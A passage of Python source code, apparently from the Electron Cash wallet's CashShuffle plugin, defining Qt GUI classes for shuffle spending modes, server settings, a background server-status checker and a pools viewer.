l.addWidget(self.numCoinsLabelBusy, 3, 3)
self.pauseBut = QPushButton("", self) # Button text filled in by refresh() call
self.pauseBut.setDefault(False); self.pauseBut.setAutoDefault(False); self.pauseBut.setCheckable(True)
self.pauseBut.setToolTip(_("Pause/Unpause the background shuffle process (frees up 'busy' coins for spending)"))
l.addWidget(self.pauseBut, 3, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelUnshuf, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelBusy, Qt.AlignLeft)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(125, ":icons/CashShuffleLogos/logo-vertical.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
self.spendButtons.buttonClicked.connect(self.onSpendRadio)
self.window.history_updated_signal.connect(self.refresh)
self.needRefreshSignal.connect(self.refresh)
self.needRefreshSignal.connect(self.window.update_fee)
self.needWalletSaveSignal.connect(self.wallet.storage.write)
self.spendButtons.buttonClicked.connect(lambda x="ignored": self.refresh())
self.pauseBut.clicked.connect(self.onClickedPause)
self.onSpendRadio() # sets up the title label and possibly warns user if starting up in "spend unshuffled" mode
def onSpendRadio(self, ignored = None):
which = self.spendingMode()
if which == self.SpendingModeShuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <b>shuffled</b> funds will be sent")))
self.titleLabel.help_text = self.msg
self.forceUnpause()
#self.pauseBut.setDisabled(True)
elif which == self.SpendingModeUnshuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <i>unshuffled</i> funds will be sent")))
self.titleLabel.help_text = self.msg2
#self.pauseBut.setEnabled(bool(self.window.background_process and not self.window.background_process.is_offline_mode()))
noprompt = self.wallet.storage.get(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, False)
if not noprompt:
ans, chk = self.window.question(
msg=_('You are now spending <b><i>unshuffled</i></b> coins. Are you sure?'),
informative_text=_('Spending and linking these coins may compromise your privacy not only for new received coins, but also for your past spending of shuffled coins.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
self.wallet.storage.put(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, bool(chk))
if not ans:
self.spendShuffled.animateClick()
return
self.window.update_fee()
def onClickedPause(self, b):
if self.window.background_process:
self.window.background_process.set_paused(b)
            # Note: the GUI refresh() will later also set this string, but we set it immediately here so the UI feels peppier
self.pauseBut.setText(_("Pause Shuffling") if not b else _("Shuffling Paused"))
self.window.utxo_list.update()
def do_clear(self): # called by plugin hook do_clear()
self.forceUnpause()
self.refresh()
def forceUnpause(self):
if self.window.background_process:
self.window.background_process.set_paused(False)
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling"))
def showEvent(self, e):
super().showEvent(e)
self.refresh()
_templates = tuple()
@rate_limited(0.250)
def refresh(self, shuf=None, unshuf=None, inprog=None, usas=None):
if not hasattr(self.window.wallet, '_shuffle_patched_'):
            # this can happen if this timer fires after the wallet was "un-monkey-patched". It's the price we pay for @rate_limited. :)
return
if shuf is None or unshuf is None or inprog is None or usas is None:
shuf, unshuf, inprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(self.window.wallet)
amount, n, amountUnshuf, nUnshuf, amountInProg, nInProg = *shuf, *unshuf, *inprog
amount += usas[0]
n += usas[1]
# TODO: handle usas separately?
if not __class__._templates: # lazy init
__class__._templates = (
# bold [0]
( # [0] is singular [1] is plural
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ),
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) )
),
# normal [1]
( #[0] singular, [1] plural
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ), # normal singular
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) ) # normal text plural template
)
)
bt = self._templates[0] # bold text templates (sub-list [0]==singular [1]==plural)
nt = self._templates[1] # normal text templates (sub-list [0]==singular [1]==plural)
mode = self.spendingMode()
tshuf = (bt if mode == self.SpendingModeShuffled else nt)[0 if n == 1 else 1] # select a template based on mode & plurality
tunshuf = (bt if mode == self.SpendingModeUnshuffled else nt)[0 if nUnshuf == 1 else 1] # select a template based on mode
self.amountLabel.setText(tshuf[0].format(self.window.format_amount(amount).strip(), self.window.base_unit()))
self.numCoinsLabel.setText(tshuf[1].format(n))
self.amountLabelUnshuf.setText(tunshuf[0].format(self.window.format_amount(amountUnshuf).strip(), self.window.base_unit()))
self.numCoinsLabelUnshuf.setText(tunshuf[1].format(nUnshuf))
tbusy = nt[0 if nInProg == 1 else 1]
self.amountLabelBusy.setText(tbusy[0].format(self.window.format_amount(amountInProg).strip(), self.window.base_unit()))
self.numCoinsLabelBusy.setText(tbusy[1].format(nInProg))
f = self.spendShuffled.font()
f.setBold(bool(mode == self.SpendingModeShuffled))
self.spendShuffled.setFont(f)
f = self.spendUnshuffled.font()
f.setBold(bool(mode == self.SpendingModeUnshuffled))
self.spendUnshuffled.setFont(f)
if self.window.background_process:
is_paused = self.window.background_process.get_paused()
self.pauseBut.setChecked(is_paused)
else:
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling") if not self.pauseBut.isChecked() else _("Shuffling Paused"))
self.pauseBut.setEnabled(bool(self.window.background_process #and mode == self.SpendingModeUnshuffled
and not self.window.background_process.is_offline_mode()))
SpendingModeShuffled = 1
SpendingModeUnshuffled = 2
SpendingModeUnknown = 0
def spendingMode(self):
        ''' Returns one of the SpendingMode* class constants above '''
if hasattr(self.wallet, "_shuffle_patched_"):
which = self.spendButtons.checkedButton()
if which is self.spendShuffled: return self.SpendingModeShuffled
elif which is self.spendUnshuffled: return self.SpendingModeUnshuffled
return self.SpendingModeUnknown
def setSpendingMode(self, spendMode):
but2Check = None
if spendMode == self.SpendingModeUnshuffled and not self.spendUnshuffled.isChecked():
but2Check = self.spendUnshuffled
elif spendMode == self.SpendingModeShuffled and not self.spendShuffled.isChecked():
but2Check = self.spendShuffled
if but2Check:
but2Check.setChecked(True)
            self.onSpendRadio() # the slot won't get called when setting radio buttons programmatically, so we force-call it
class NetworkCheckerDelegateMixin:
'''Abstract base for classes receiving data from the NetworkChecker.
SettingsDialog implements this, as does the PoolsWindow.'''
settingsChanged = pyqtSignal(dict)
statusChanged = pyqtSignal(dict)
class SettingsDialogMixin(NetworkCheckerDelegateMixin, PrintError):
    ''' Abstract base class -- do not instantiate this directly, as it will raise errors
    because the pyqtSignal cannot be bound to a non-QObject.
    Instead, use SettingsDialog and/or SettingsTab, which inherit from this and
    are proper QObject subclasses.
    Also call __init__ on the QObject/QWidget first, before calling this
    class's __init__ method.'''
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
formChanged = pyqtSignal()
_DEFAULT_HOST_SUBSTR = "shuffle.servo.cash" # on fresh install, prefer this server as default (substring match)
def __init__(self, config, message=None):
assert config
assert isinstance(self, QWidget)
self.config = config
self.networkChecker = None
self.serverOk = None
self._vpLastStatus = dict()
self.setup(message)
#DEBUG
destroyed_print_error(self)
def showEvent(self, e):
super().showEvent(e)
self.startNetworkChecker()
def hideEvent(self, e):
super().hideEvent(e)
self.stopNetworkChecker()
def closeEvent(self, e):
super().closeEvent(e)
def from_combobox(self):
d = self.cb.currentData()
if isinstance(d, dict):
host, info, ssl = d.get('server'), d.get('info'), d.get('ssl')
self.le.setText(host)
self.sb.setValue(info)
self.chk.setChecked(ssl)
en = self.cb.currentIndex() == self.cb.count()-1
self.le.setEnabled(en); self.sb.setEnabled(en); self.chk.setEnabled(en)
self.formChanged.emit()
def get_form(self):
ret = {
'server': self.le.text(),
'info' : self.sb.value(),
'ssl' : self.chk.isChecked()
}
if self.isVisible():
customIdx = self.cb.count()-1
if self.cb.currentIndex() == customIdx:
# "remember" what they typed into the custom area..
d = self.cb.itemData(customIdx)
if ret != d:
self.cb.setItemData(customIdx, ret)
return ret
def setup_combo_box(self, selected = {}):
def load_servers(fname):
r = {}
try:
zips = __file__.find(".zip")
if zips == -1:
with open(os.path.join(os.path.dirname(__file__), fname), 'r') as f:
r = json.loads(f.read())
else:
from zipfile import ZipFile
zip_file = ZipFile(__file__[: zips + 4])
with zip_file.open("shuffle/" + fname) as f:
r = json.loads(f.read().decode())
            except Exception:
                self.print_error("Error loading server list from {}: {}".format(fname, sys.exc_info()[1]))
return r
# /
servers = load_servers("servers.json")
selIdx, defIdx = (-1,)*2
self.cb.clear()
for host, d0 in sorted(servers.items()):
d = d0.copy()
d['server'] = host
item = _elide(host) + (' [ssl]' if d['ssl'] else '')
self.cb.addItem(item, d)
if selected and selected == d:
selIdx = self.cb.count()-1
elif defIdx < 0 and self._DEFAULT_HOST_SUBSTR in host:
defIdx = self.cb.count()-1
self.cb.addItem(_("(Custom)"))
if selIdx > -1:
self.cb.setCurrentIndex(selIdx)
elif selected and len(selected) == 3:
custIdx = self.cb.count()-1
self.cb.setItemData(custIdx, selected.copy())
self.cb.setCurrentIndex(custIdx)
elif defIdx > -1:
self.cb.setCurrentIndex(defIdx)
def refreshFromSettings(self):
selected = Plugin.get_and_validate_network_settings(self.config)
self.setup_combo_box(selected = selected)
return selected
def setup(self, msg):
vbox = QVBoxLayout(self)
if not msg:
msg = _("Choose a CashShuffle server or enter a custom server.\nChanges will require the CashShuffle plugin to restart.")
l = QLabel(msg + "\n")
l.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
vbox.addWidget(l)
grid = QGridLayout()
vbox.addLayout(grid)
self.cb = QComboBox(self)
self.refreshFromSettings()
grid.addWidget(QLabel(_('Servers'), self), 0, 0)
grid.addWidget(self.cb, 0, 1)
grid.addWidget(QLabel(_("Host"), self), 1, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 1, 1, 1, 2); grid.setColumnStretch(2, 1)
self.le = QLineEdit(self); hbox.addWidget(self.le)
self.le.textEdited.connect(lambda x='ignored': self.formChanged.emit())
hbox.addWidget(QLabel(_("P:"), self))
self.sb = QSpinBox(self); self.sb.setRange(1, 65535); hbox.addWidget(self.sb)
self.sb.valueChanged.connect(lambda x='ignored': self.formChanged.emit())
self.chk = QCheckBox(_("SSL"), self); hbox.addWidget(self.chk)
self.chk.toggled.connect(lambda x='ignored': self.formChanged.emit())
self.cb.currentIndexChanged.connect(lambda x='ignored': self.from_combobox())
self.from_combobox()
hbox2 = QHBoxLayout()
vbox.addLayout(hbox2)
self.statusGB = QGroupBox(_("Status"), self)
hbox2.addWidget(self.statusGB)
vbox2 = QVBoxLayout(self.statusGB)
self.statusLabel = QLabel("", self.statusGB)
self.statusLabel.setMinimumHeight(50)
self.statusLabel.setAlignment(Qt.AlignAbsolute|Qt.AlignTop)
vbox2.addWidget(self.statusLabel)
# add the "Coin selection settings..." link
self.coinSelectionSettingsLabel = QLabel("<a href='dummy'>{}</a>".format(_("Coin selection settings...")))
self.coinSelectionSettingsLabel.linkActivated.connect(self.onCoinSelectionSettingsClick)
vbox.addWidget(self.coinSelectionSettingsLabel)
self.vbox = vbox
if not isinstance(self, SettingsTab):
# add close button only if not SettingsTab
vbox.addStretch()
buttons = Buttons(CloseButton(self), OkButton(self))
vbox.addLayout(buttons)
# NEW! add the "View pools..." button to the bottom
vbox = self.statusGB.layout()
hbox = QHBoxLayout()
hbox.addStretch(1)
self.poolsBut = QPushButton(_("View pools..."))
f = self.poolsBut.font(); f.setPointSize(f.pointSize()-(2 if sys.platform=='darwin' else 1)); self.poolsBut.setFont(f)
hbox.addWidget(self.poolsBut)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.statusChanged.connect(self._vpGotStatus)
self.poolsBut.setEnabled(False)
self.poolsBut.clicked.connect(self._vpOnPoolsBut, Qt.DirectConnection)
def kill(self):
self.stopNetworkChecker()
def onCoinSelectionSettingsClick(self, ignored):
win = CoinSelectionSettingsWindow()
win.exec_()
win.deleteLater()
if self.window().isVisible():
self.window().raise_()
self.activateWindow()
def _vpGotStatus(self, sdict):
self._vpLastStatus = sdict.copy()
if sdict.get('status') in (_("Ok"), _("Banned")):
self.poolsBut.setEnabled(True)
else:
self.poolsBut.setEnabled(False)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=True)
def _on_statusChanged(self, d):
red, blue, green = "red", "blue", "green"
try: red, blue, green = ColorScheme.RED._get_color(0), ColorScheme.BLUE._get_color(0), ColorScheme.GREEN._get_color(0)
except AttributeError: pass
#self.print_error("status changed", d)
if not d: # Empty dict means we are connecting
self.serverOk = None
self.statusLabel.setText("<font color=\"{}\"><i>{}</i></font>".format(blue, _("Checking server...")))
return
        if d.get('failed'): # Dict with only 1 key, 'failed', means the connection failed
reason = d['failed']
if reason == 'offline_mode':
reason = _("Electron Cash is in offline mode.")
elif reason == 'bad':
reason = _("Server is misconfigured")
elif reason == 'ssl':
reason = _("Failed to verify SSL certificate")
else:
reason = _("Connection failure")
self.statusLabel.setText("<b>" + _("Status") + ":</b> <font color=\"{}\">{}</font>".format(red, reason))
self.serverOk = False
return
# any other case has all the below keys defined
self.serverOk = d['status'] == _('Ok')
self.statusLabel.setText(
'''
<b>{}:</b> <i>{}</i><br>
<b>{}:</b> <font color="{}">{}</font> {} {}
<small>{}: {} {}: {} {}: {}</small>
'''
.format(_('Server'), _elide(d['host'], maxlen=40, startlen=12),
_('Status'), green if not d['banned'] else "#dd4444", d['status'], " <b>{}</b> {}".format(_("Ban score:"),d['banScore']) if d['banScore'] else '', '<br>' if d['banScore'] else '',
_('Pool size'), d['poolSize'],
_('Connections'),
d['connections'],
_('Active pools'), d['pools'])
)
def _on_formChange(self):
try:
#self.print_error("onFormChange")
d = self.get_form()
self.settingsChanged.emit(d)
except RuntimeError as e:
# Paranoia guard against C++ object deleted exception
# (we may get called from a QTimer.singleShot below)
if 'C++' not in str(e).upper():
raise
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = NetworkChecker(self)
self.statusChanged.connect(self._on_statusChanged, Qt.QueuedConnection)
self.formChanged.connect(self._on_formChange, Qt.QueuedConnection)
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(100, self._on_formChange) # kicks off the network checker by sending it new settings
def stopNetworkChecker(self):
if self.networkChecker:
try: self.statusChanged.disconnect(self._on_statusChanged)
except TypeError: pass # not connected
            try: self.formChanged.disconnect(self._on_formChange)
except TypeError: pass # not connected
self.networkChecker.stop()
self.networkChecker = None
self.print_error("Stopped network checker.")
# /
# /SettingsDialogMixin
class SettingsDialog(SettingsDialogMixin, AppModalDialog):
''' Concrete class for the stand-alone Settings window you get when
you right-click and get "CashShuffle Settings..." from the CashShuffle status
button context menu '''
def __init__(self, title, config, message=None, windowFlags=None):
AppModalDialog.__init__(self, title=title, windowFlags=windowFlags, parent=None)
self.setMinimumSize(400, 350)
SettingsDialogMixin.__init__(self, config=config, message=message)
# /SettingsDialog
class SettingsTab(SettingsDialogMixin, QWidget):
# Apparently if you inherit from a C++ object first it creates problems.
# You are supposed to inherit from the mixins in Python first, then the
    # Qt C++ object last. Who knew. All of the Electron Cash codebase apparently
# is doing it wrong.
# See this: http://python.6.x6.nabble.com/Issue-with-multiple-inheritance-td5207771.html
# So we inherit from our mixin first. (Note I had problems with overriding
# __init__ here and Qt's C++ calling the wrong init here.)
applyChanges = pyqtSignal(object)
def __init__(self, parent, config, message=None):
QWidget.__init__(self, parent=parent)
SettingsDialogMixin.__init__(self, config=config, message=message)
# add the "Apply" button to the bottom
self.apply = QPushButton(_("Apply"), self)
hbox = QHBoxLayout()
self.vbox.addLayout(hbox)
self.vbox.addStretch()
hbox.addStretch(1)
hbox.addWidget(self.apply)
self.apply.clicked.connect(self._re_emit_applyChanges)
def _re_emit_applyChanges(self):
self.applyChanges.emit(self)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=False, parent_window=self)
# /SettingsTab
class NetworkChecker(PrintError):
''' Runs in a separate thread, checks the server automatically when the settings form changes
and publishes results to GUI thread. '''
pollTimeSecs = 15.0
checkShufflePort = True
verifySSL = True # if true, verify the ssl socket of the shuffle port when checking the server
def __init__(self, parent):
assert isinstance(parent, NetworkCheckerDelegateMixin), "Parent to NetworkChecker must be a NetworkCheckerDelegateMixin"
self.weakParent = Weak.ref(parent)
self.q = queue.Queue()
self.thread = threading.Thread(target=self.thread_func, daemon=True)
self._please_stop = False
self._sock = None
self._update_ct = 0
parent.settingsChanged.connect(self._on_settings_changed, Qt.QueuedConnection)
self.print_error("created")
finalization_print_error(self)
def stop(self):
if self.thread.is_alive():
self._please_stop = True
self.q.put(None) # signal to thread to die
try: self._sock.close() # force close thread
except: pass
self.thread.join(timeout=15.0) # wait for thread to finish
if self.thread.is_alive():
# This should never happen
self.print_error("*** WARNING: Waited for thread to exit for 15.0 seconds, but it is still running! FIXME!")
def start(self):
if not self.thread.is_alive():
self.q.put(None) # paranoia just in case
self.q = queue.Queue() # clear the queue
self._please_stop = False
self.thread.start() # this raises RuntimeError if called more than once.
def _on_settings_changed(self, d):
self._update_ct = 0 # reset ctr for these settings. ctr = 0 causes us to tell gui to draw the "Connecting, please wait..." text
self.q.put(d.copy()) # notify thread which waits on this q
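    # _wait_drain_q() drains self.q and returns the newest settings dict; it returns None when the thread should exit, or last_settings if nothing new arrives within pollTimeSecs.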
def _wait_drain_q(self, last_settings):
q = self.q
try:
res = None
try:
# Drain queue to get latest settings
while True:
# keep reading from the queue until it's empty
res = q.get_nowait()
if res is None:
# we got a None, return early -- this indicates abort thread
return res
except queue.Empty:
''' No settings were waiting in queue.. move to blocking
operation '''
if self._please_stop:
return # indicate stop
if res is not None:
# we had a result, return
return res
# no result from Queue, block for pollTimeSecs
return q.get(timeout=self.pollTimeSecs)
except queue.Empty:
# no result in pollTimeSecs, return last settings value
return last_settings
def thread_func(self):
try:
self.print_error("thread entered")
settings = dict()
while True:
settings = self._wait_drain_q(settings)
if settings is None:
return # exit thread if we got a None
if settings:
self._on_update_status(settings)
finally:
self.print_error("thread exiting")
def _emit_status_changed(self, d):
self.weakParent() and self.weakParent().statusChanged.emit(d)
def _on_update_status(self, d):
d = d.copy()
#self.print_error("updateStatus", d) # XXX
is_bad_server, is_bad_ssl, is_offline_mode = False, False, False
try:
if not Network.get_instance():
is_offline_mode = True
raise RuntimeError("No network")
if self._update_ct == 0:
self._emit_status_changed(dict()) # tells GUI we are "connecting..."
self._update_ct += 1
port, poolSize, connections, pools, banScore, banned = query_server_for_stats(d['server'], d['info'], d['ssl'])
if self._please_stop:
return
if poolSize < 3:
# hard-coded -- do not accept servers with poolSize < 3
is_bad_server = True
raise RuntimeError("PoolSize must be >=3, got: {}".format(poolSize))
if d['ssl'] and self.verifySSL and not verify_ssl_socket(d['server'], int(port), timeout=7.5):
is_bad_ssl = True
raise RuntimeError("Could not verify SSL server certificate.")
if self._please_stop:
return
if self.checkShufflePort:
self._sock = socket.create_connection((d['server'], port), 5.0) # test connectivity to port
self._sock.close()
self._sock = None
if self._please_stop:
return
self._emit_status_changed({
'host' : d['server'],
'status' : _('Ok') if not banned else _('Banned'),
'poolSize' : str(poolSize),
'connections' : str(connections),
'pools' : str(len(pools)),
'poolsList' : pools,
'banScore' : banScore,
'banned' : banned,
'name' : d['server'] + ":" + str(d['info']),
'info' : d['info'],
'ssl' : d['ssl'],
})
except Exception as e:
# DEBUG
#import traceback
#traceback.print_exc()
# /DEBUG
self.print_error("exception on connect:",str(e))
if is_offline_mode:
self._emit_status_changed({'failed' : 'offline_mode'})
elif is_bad_ssl:
self._emit_status_changed({'failed' : 'ssl'})
elif is_bad_server:
self._emit_status_changed({'failed' : 'bad'})
else:
self._emit_status_changed({'failed' : 'failed'})
# / NetworkChecker
class PoolsWinMgr(QObject, PrintError):
simpleChangedSig = pyqtSignal()
_instance = None
def __init__(self):
assert not PoolsWinMgr._instance, "More than 1 PoolsWinMgr instance detected -- PoolsWinMgr is a singleton!"
super().__init__()
PoolsWinMgr._instance = self
self.poolWindows = {}
self.print_error("created")
#DEBUG
destroyed_print_error(self)
def __del__(self):
stale = True
if PoolsWinMgr._instance is self:
PoolsWinMgr._instance = None
stale = False
print_error("[{}] finalized{}".format(__class__.__name__, " (stale instance)" if stale else ''))
if hasattr(super(), '__del__'):
super().__del__()
#public methods
@classmethod
def instance(cls, create_if_missing=True):
if not cls._instance and create_if_missing:
cls._instance = cls()
return cls._instance
@classmethod
def killInstance(cls):
if cls._instance:
cls._instance._killAll()
cls._instance.deleteLater()
cls._instance = None
@classmethod
def closeAll(cls):
''' This implicitly will also delete all the windows when event loop next runs. '''
app = QApplication.instance()
if app:
poolWins = [w for w in app.topLevelWidgets() if isinstance(w, PoolsWindow)]
for w in poolWins:
w.close()
@classmethod
def show(cls, stats_dict, network_settings, config, *, parent_window=None, modal=False):
mgr = cls.instance()
return mgr._createOrShow(stats_dict, network_settings, config, parent_window=parent_window, modal=modal)
#private methods
def _createOrShow(self, stats_dict, network_settings, config, *, parent_window=None, modal=False):
d = stats_dict
if not isinstance(d, dict) or not d or not network_settings:
self.print_error("createOrShow: got invalid args.. will not create/show a window")
return
name = d['name']
w = self.poolWindows.get(name)
if w and ((modal and w.windowModality() != Qt.ApplicationModal)
or (not modal and w.windowModality() != Qt.NonModal)):
self.print_error("Found extant window {} but modal spec != extant modal, killing...".format(name))
self._kill(name)
w = None
if not w:
self.print_error("Creating", name)
w = PoolsWindow(config, parent_window, d, network_settings, modal=modal)
self.poolWindows[name] = w
w.closed.connect(self._kill) # clean-up instance
else:
self.print_error("Updating", name)
w.weakParent = Weak.ref(parent_window) if parent_window else None
w.settings = network_settings
w.settingsChanged.emit(w.settings)
if w.isMinimized():
w.showNormal()
w.show(); w.raise_(); w.activateWindow()
return w
def _kill(self, name):
window = self.poolWindows.pop(name) # will actually delete the QWidget instance.
window.stopNetworkChecker()
window.deleteLater() # force Qt delete. This call may be superfluous
self.print_error("Killed", name)
def _killAll(self):
for n in self.poolWindows.copy():
self._kill(n)
# /PoolsWinMgr
class PoolsWindow(QWidget, PrintError, NetworkCheckerDelegateMixin):
closed = pyqtSignal(str)
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
def __init__(self, config, pseudo_parent, serverDict, settings, modal=False):
super().__init__() # top-level window
self.setWindowModality(Qt.ApplicationModal if modal else Qt.NonModal)
self.config = config
self.weakParent = Weak.ref(pseudo_parent) if pseudo_parent else None
self.sdict = serverDict.copy()
self.settings = settings
self.networkChecker = None
self.needsColumnSizing = True
name = self.sdict['name']
self.setObjectName(name)
self.setWindowTitle("CashShuffle - {} - Pools".format(_elide(name)))
self.vbox = QVBoxLayout(self)
# pools group box
self.poolsGB = QGroupBox(_("{} Pools").format(_elide(name)) + " (0)")
self.vbox.addWidget(self.poolsGB)
self.vbox.setStretchFactor(self.poolsGB, 2)
vbox2 = QVBoxLayout(self.poolsGB)
# ban label
self.banLabel = HelpLabel('', _("Bans usually occur when other shufflers detect invalid inputs coming from your client. Bans are temporary and usually last up to 30 minutes.\n\nThey may happen occasionally in rare circumstances. However, if this keeps happening, please contact the developers and file a bug report."))
self.banLabel.setHidden(True)
vbox2.addWidget(self.banLabel)
self.tree = QTreeWidget()
self.tree.setSelectionMode(QAbstractItemView.NoSelection)
self.tree.setMinimumHeight(50)
self.tree.setHeaderItem(QTreeWidgetItem([_('Tier'), _('Players'), _('Type'), _('Version'), _('Full')]))
vbox2.addWidget(self.tree)
# The "simple view" checkbox
hbox = QHBoxLayout()
self.simpleChk = QCheckBox(_("Omit incompatible pools")) # NB: checkbox state will be set in self.refresh()
hbox.addWidget(self.simpleChk)
vbox2.addLayout(hbox)
# bottom buts
self.vbox.addStretch()
hbox = QHBoxLayout()
self.closeBut = QPushButton(_("Close"))
hbox.addStretch(1)
hbox.addWidget(self.closeBut)
self.vbox.addLayout(hbox)
# signals
self.closeBut.clicked.connect(self.close)
self.closeBut.setDefault(True)
self.statusChanged.connect(self.refresh)
self.simpleChk.clicked.connect(self._setSimple)
# NB: some signal/slot connections are also made in showEvent()
# etc...
self.resize(400,300)
#DEBUG
destroyed_print_error(self)
def diagnostic_name(self):
return "{}/{}".format(super().diagnostic_name(), self.objectName())
def closeEvent(self, e):
#self.print_error("Close")
self.closed.emit(self.objectName())
parent = self.weakParent and self.weakParent()
if isinstance(parent, QWidget) and parent.isVisible() and parent.window().isVisible():
try:
# for some reason closing this dialog raises the wallet window and not the network dialog
# activate the network dialog if it's up..
parent.window().activateWindow()
except RuntimeError as e:
# Deal with wrapped C/C++ object deleted. For some reason
# the weakRef is still alive even after C/C++ deletion
# (and no other references referencing the object!).
if 'C++' in str(e):
self.print_error("Underlying C/C++ object deleted. Working around PyQt5 bugs and ignoring...")
else:
raise
super().closeEvent(e)
e.accept()
def hideEvent(self, e):
super().hideEvent(e)
if e.isAccepted():
#self.print_error("Hide")
try: PoolsWinMgr.instance().simpleChangedSig.disconnect(self._simpleChangedSlot)
except TypeError: pass # Not connected.
self.stopNetworkChecker()
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
#self.print_error("Show")
PoolsWinMgr.instance().simpleChangedSig.connect(self._simpleChangedSlot)
self.refresh(self.sdict)
self.startNetworkChecker()
# do stuff related to refreshing, etc here...
def _isSimple(self):
return bool(self.config.get(ConfKeys.Global.VIEW_POOLS_SIMPLE, True))
def _setSimple(self, b):
b = bool(b)
if b != self._isSimple():
self.config.set_key(ConfKeys.Global.VIEW_POOLS_SIMPLE, b)
self.needsColumnSizing = True
PoolsWinMgr.instance().simpleChangedSig.emit()
def _simpleChangedSlot(self):
self.refresh(self.sdict)
def refresh(self, sdict):
# NB: sdict may be non-empty (has actual results) but still contain no
# pools if server has no pools. It's only empty before we get a response
# from stats port.
if not sdict:
return
if self.sdict is not sdict:
self.sdict = sdict.copy()
simple = self._isSimple()
self.simpleChk.setChecked(simple)
mysettings = BackgroundShufflingThread.latest_shuffle_settings
# handle if we detected a ban
if self.sdict.get('banned'):
banScore = self.sdict.get('banScore') or 0
self.banLabel.setText('<font color="#dd4444"><b>{}</b></font> (ban score: {})'.format(_("Banned"), banScore))
self.banLabel.setHidden(False)
else:
self.banLabel.setHidden(True)
pools = self.sdict.get('poolsList', list()).copy()
poolSize = str(self.sdict.get('poolSize', ''))
self.tree.clear()
try:
pools.sort(reverse=True, key=lambda x:(0 if x['full'] else 1, x['amount'], x['members'], -x.get('version',0)))
except (KeyError, ValueError, TypeError):
# hmm. Pools dict is missing or has bad keys. Assume bad input. Clear list and proceed with a 'no pools' message
pools = []
for c in range(2,4):
self.tree.setColumnHidden(c, simple)
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
for p in pools:
typ, version = p.get('type', mysettings.type_name), p.get('version', mysettings.version)
is_my_settings = typ == mysettings.type_name and version == mysettings.version
if not simple or is_my_settings:
twi = QTreeWidgetItem([
format_satoshis_plain(p['amount']) + " BCH",
"{} / {}".format(str(p['members']), poolSize),
str(p.get('type','?')).lower(),
str(p.get('version','?')),
"√" if p['full'] else '-',
])
if not is_my_settings:
grayify(twi)
self.tree.addTopLevelItem(twi)
tit = self.poolsGB.title().rsplit(' ', 1)[0]
self.poolsGB.setTitle(tit + " ({})".format(self.tree.topLevelItemCount()))
def sizeColumnsToFit():
for i in range(self.tree.columnCount()):
self.tree.resizeColumnToContents(i)
if not self.tree.topLevelItemCount():
twi = QTreeWidgetItem([_('No Pools'), '', '', '', ''])
f = twi.font(0); f.setItalic(True); twi.setFont(0, f)
self.tree.addTopLevelItem(twi)
self.tree.setFirstItemColumnSpanned(twi, True)
self.tree.setHeaderHidden(True)
sizeColumnsToFit() # in no pools mode we unconditionally size to fit
self.needsColumnSizing = True # once we enter this "No pools.." mode, we need to force resize columns next time we have real entries to avoid layout weirdness
else:
self.tree.setHeaderHidden(False)
if self.needsColumnSizing: # this flag suppresses resizing each refresh to allow users to manually size the columns after a display with real data appears.
sizeColumnsToFit()
self.needsColumnSizing = False
def _kick_off_nc(self):
try:
self.settingsChanged.emit(self.settings) # kicks off the NetworkChecker by sending it some server settings to check
except RuntimeError:
pass # paranoia: guard against wrapped C++ object exception.. shouldn't happen because timer was keyed off this object as receiver
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = nc = NetworkChecker(self)
nc.pollTimeSecs, nc.verifySSL, nc.checkShufflePort = 2.0, False, False
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(500, self._kick_off_nc) # despite appearances the timer will not fire after object deletion, due to PyQt5 signal/slot receiver rules
def stopNetworkChecker(self):
if self.networkChecker:
self.networkChecker.stop() # waits for network checker to finish...
self.networkChecker = None
self.print_error("Stopped network checker.")
# /PoolsWindow
class CoinSelectionSettingsWindow(AppModalDialog, PrintError):
''' The pop-up window to manage minimum/maximum coin amount settings.
Accessible from a link in the "CashShuffle Settings.." window or Network
Dialog tab. '''
def __init__(self, title=None):
super().__init__(title=title or _("CashShuffle - Coin Selection Settings"), parent=None)
vbox = QVBoxLayout(self)
lbl = QLabel(_("Specify minimum and maximum coin amounts to select for shuffling:"))
lbl.setWordWrap(True)
